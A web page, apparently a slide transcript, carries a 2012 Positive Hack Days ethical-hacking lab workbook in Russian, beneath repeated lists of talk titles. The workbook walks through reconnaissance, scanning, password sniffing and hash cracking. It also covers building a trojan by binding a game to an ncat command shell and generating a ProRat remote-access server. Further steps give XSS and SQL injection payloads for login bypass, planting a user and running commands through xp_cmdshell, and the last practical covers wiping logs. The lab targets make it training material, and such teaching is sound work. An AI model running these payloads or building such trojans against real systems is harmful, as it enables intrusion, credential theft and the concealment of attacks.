Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

Mehr von Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Этичный хакинг

  • 1. Positive Hack Days 2012 Сергей Клевогин Этичный хакинг. Рабочая тетрадь. Практическая работа 0. Методология СЕН. Убедиться, что по методологии СЕН хакинг состоит из нескольких фаз: 1. Сбор данных 2. Сканирование и перечисление 3. Взлом системы и сервисов 4. Поддержка доступа 5. Скрытие следов Для этого в Google набрать «Ethical Hacking Phases», перейти по первой же ссылке http://hack-o-crack.blogspot.com/2010/12/five-stages-of-ethical-hacking.html Посмотреть на текст. Определить на какой фазе хакинга находится использование троянов, а на какой Metasploit. 1
  • 2. Positive Hack Days 2012 Сергей Клевогин Практическая работа 1. Сбор данных. Задача 1. Убедиться, что существует Google Hacking Data Base. Для этого в Google набрать «GHDB», перейти по первой же ссылке http://www.hackersforcharity.org/ghdb/ Просмотреть различные типы запросов, позволяющие обнаружить: Бюллетени и уязвимости Сообщения об ошибках Файлы, содержащие интересную информацию Файлы, содержащие пароли Файлы, содержащие имена пользователей Страницы-плацдармы Страницы входа в порталы Страницы, содержащие данные о сети или уязвимостях Важные каталоги Важная информация о покупках в Интернете Различные онлайн устройства Уязвимые файлы Уязвимые серверы Сведения о веб-сервере Покликать по ссылкам, чтобы посмотреть примеры запросов каждого типа. Перейти к сообщениям об ошибках: http://www.hackersforcharity.org/ghdb/?function=summary&cat=10 Обнаружить последнюю запись в базе данных. Обратить внимание на дату записи. Для интереса перейти по первой ссылке http://www.hackersforcharity.org/ghdb/?function=detail&id=143 и поискать в Google « intitle:”Nessus Scan Report” “This file was generated by Nessus” »: Обнаружить уже готовый отчет об уязвимостях Nessus. Проверить, не притаился ли подобный отчет об уязвимостях на сайте вашей организации. 2
  • 3. Positive Hack Days 2012 Сергей Клевогин Задача 2. Поискать более новую базу данных GHDB. Для этого в Google набрать «GHDB 2012», перейти по первой же ссылкe http://www.exploit-db.com/google-dorks/ Обратить внимание на последние записи «Latest Google Hacking Entries». Сравнить различные типы запросов с предыдущим списком. Не найти отличий. Снова покликать по ссылкам, чтобы посмотреть примеры запросов каждого типа. Перейти к сообщениям об ошибках: http://www.exploit-db.com/google-dorks/7/ Перейти по первой ссылке http://www.exploit-db.com/ghdb/3785/ и поиcкать в Google «inurl:"*.php?*=*.php" intext:"Warning: include" -inurl:.html -site:"php.net" - site:"stackoverflow.com" -inurl:"*forums*"» Найти реальный сервер в Интернете с сообщением об ошибке. Заглянуть на главную страницу сайта. Оценить приличность дизайна. Проверить, нет ли страниц с подобной ошибкой на сайте вашей организации. 3
  • 4. Positive Hack Days 2012 Сергей Клевогин Задача 3. Познакомиться с Search Diggity. http://www.stachliu.com/resources/tools/google-hacking-diggity-project/attack-tools/ Скачать и установить SearchDiggity. Пока устанавливается почитать справку. Запустить SearchDiggity, идентифицировать элементы интерфейса. Следуя указаниям справки: Создать API ключ. Завести аккаунт в Google, если его еще нет; Создать Google Custom Search ID; Выбрать сайт в окошке выбора сайта справа; Запустить сканирование вашего сайта, выбрав запросы GHDB. Добиться результата подобного этому: Изучить другие возможности DiggitySearch. 4
  • 5. Positive Hack Days 2012 Сергей Клевогин Задача 4. Выкачать сайты Cars и Brown себе на компьютер. Для этого скачать и установить httrack. После установки обнаружить на компьютере графический интерфейс WinHTTrack и средство командной строки httrack . Один сайт загрузите, используя WinHTTrack, другой с использованием httrack. Чтобы посмотреть синтаксис httrack используем httrack --help 5
  • 6. Positive Hack Days 2012 Сергей Клевогин Практическая работа 2. Сканирование и перечисление. Задача 0. Познакомиться с теорией сканирования. Для этого: познакомиться с RFC 791, 792, 793. ( http://www.rfc-editor.org/ ) Зайти на сайт nmap: http://nmap.org/man/ru/man-port-scanning-techniques.html Познакомиться с основными приемами сканирования портов. Добавить ссылку в избранное, чтобы потом повторно перечитать. Узнать, что такое перечисление и какое оно бывает. Для этого запомнить, что бывает: Перечисление NetBIOS Перечисление SNMP Перечисление UNIX Перечисление LDAP Перечисление NTP Перечисление SMTP Перечисление DNS 6
  • 7. Positive Hack Days 2012 Сергей Клевогин Задача 1. Просканировать сеть, обнаружить учебный веб-сервер. Для этого скачать и установить nmap. Изучить синтаксис nmap: nmap --help Запустить сканирование из интерфейса командной строки: nmap 192.168.1.0/25 -p80 Обнаружить системы с открытым 80 портом Запустить сканирование из графического интерфейса и посмотреть результат. Задача 2. Обнаружить шлюз по умолчанию на целевой системе со включенным SNMP. Для этого познакомиться с RFC1213, RFC 1157 и синтаксисом snmputil Чтобы узнать шлюз нужно выполнить команду: snmputil get CEH public .1.3.6.1.2.1.4.21.1.7.0.0.0.0 7
  • 8. Positive Hack Days 2012 Сергей Клевогин Практическая работа 3. Хакинг системы. Задача 0. Познакомиться с архитектурой операционной системы. Для этого в Google набрать «Архитектура Windows» и кликнуть Картинки Картинки обычно сопровождаются статьями с полезной информацией. То же самое повторить с архитектурой Linux/Unix. Сделать вывод,что система взаимодействует с внешним миром через: драйверы, компоненты ядра (и даже прошивки оборудования); сетевые сервисы; клиентские приложения, которые обращаются на чужой сервер; любые приложения, которые скачиваются и запускаются в системе (трояны). 8
  • 9. Positive Hack Days 2012 Сергей Клевогин Задача 1. Подсмотреть пароль, передаваемый по сети. Для этого скачать и установить Wireshark (http://www.wireshark.org ) Подключиться к любому серверу по любому незащищенному протоколу, требующему аутентификацию. Найти пароль в дампе Wireshark. Если это пароль доменной учетной записи, то однажды подсмотренный через незащищенный протокол, может быть использован через любой другой протокол. Задача 2. Подсмотреть все пароли, передаваемые по сети. Скачать и установить Cain & Abel (http://www.oxid.it/cain.html ) Запустить сниффер. Проявить сетевую активность, обратить внимание на захваченные пароли. 9
  • 10. Positive Hack Days 2012 Сергей Клевогин Задача 3. Атаковать хэши паролей. В Cain & Abel на вкладке Cracker импортировать хэши паролей с локального компьютера. Провести атаку на пароли локальных пользователей по словарю и брут-форсом. 10
  • 11. Positive Hack Days 2012 Сергей Клевогин Задача 4. Использование кейлоггера. Установить PuntoSwitcher (http://punto.yandex.ru ) Включить возможность ведения дневника. Увидеть, как в дневнике отображаются пароли. 11
  • 12. Positive Hack Days 2012 Сергей Клевогин Практическая работа 4. Поддержка доступа. Задача 1. Создать трояна, открывающего shell. Для этого используя MicroJoiner объединить игру Gamux.exe с ncat -l 8888 –e cmd После запуска игры к компьютеру можно подключиться из командной строки: ncat 192.168.1.14 8888 12
  • 13. Positive Hack Days 2012 Сергей Клевогин Задача 2. Создать трояна с помощью ProRat Для этого скачать и запустить ProRat (http://www.prorat.net/downloads.php ) Сделать сервер, используя настройки по умолчанию и без уведомлений. Запустить сервер, початиться с жертвой. 13
  • 14. Positive Hack Days 2012 Сергей Клевогин Практическая работа 5. Взлом веб-сервера посредством XSS Задача 1. Протестировать сайт Cars на возможность XSS. Для этого попробовать добавить в Feedback сообщение: hello <script>alert("PREVED")</script> Задача 2. Протестировать сайт Brown на возможность XSS. Для этого попробовать добавить в Feedback сообщение: hello <script>alert("PREVED")</script> 14
  • 15. Positive Hack Days 2012 Сергей Клевогин Практическая работа 6. Взлом посредством SQL - инъекции Задача 0. Познакомиться с теорией SQL инъекций. Для этого можно использовать различные источники (http://ru.wikipedia.org/wiki ) Задача 1. Обойти аутентификацию. Для этого в форме ввода логина можно попробовать SQL инъекцию: blah' or 1=1 -- Задача 2. Идентифицировать число столбцов таблицы login_t базы данных Cars. Для этого в форме ввода логина пробуем SQL инъекцию: 1' UNION SELECT 1,..,N ;-- и следим за логикой приложения При инъекции 1' UNION SELECT 1,2,3 ;-- ответ приложения изменится, значит, сервер принял запрос и в таблице три поля. 15
  • 16. Positive Hack Days 2012 Сергей Клевогин Задача 3. Создать пользователя в базе данных SQL. Для этого будем пробовать различные SQL инъекции: blah';insert into login_t values ('xaker','123');-- В случае успешной инъекции получится зайти в систему с новой учетной записью. Задача 4. Выполнить команду на сервере. Потестируем возможности выполнения различных команд. Например, '; exec master..xp_cmdshell 'ipconfig/all > C:inetpubwwwrootbrownipconfig.txt';-- В случае успеха результат команды будет доступен через URL http://ceh/Brown/ipconfig.txt Практическая работа 7. Скрытие следов. Удалить все программы и временные файлы, почистить логи и ключи реестра. 16